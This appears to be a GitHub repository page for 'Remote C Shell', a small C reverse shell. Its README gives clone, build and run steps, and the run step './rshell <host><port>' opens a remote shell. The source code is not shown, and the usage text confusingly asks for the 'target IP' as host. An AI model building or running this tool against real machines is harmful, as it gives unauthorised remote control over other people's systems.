Skip to content

Folders and files

NameName
Last commit message
Last commit date

Latest commit

History

3 Commits

Repository files navigation

Remote C Shell 🐚

Welcome to the Remote C Shell repository! This C-based reverse shell enables remote command execution on a target machine.

Usage 📋

To use the remote shell, run the following command:

./rshell <host><port>

Files in This Repository 📂

  • LICENSE: License information for the project.
  • Makefile: Makefile to compile the project.
  • README.md: This readme file.
  • rshell.c: The source code for the reverse shell.

Getting Started 🚀

  1. Clone the repository:

    git clone https://github.com/fenrirsec/RemoteCShell.git
    cd RemoteCShell
  2. Compile the source code:

    make
  3. Run the reverse shell:

    ./rshell <host><port>

Replace <host> with the target IP address and <port> with the desired port number.


Stay safe and use responsibly! 🛡️

About

Short remote C shell

Resources

Stars

1 star

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages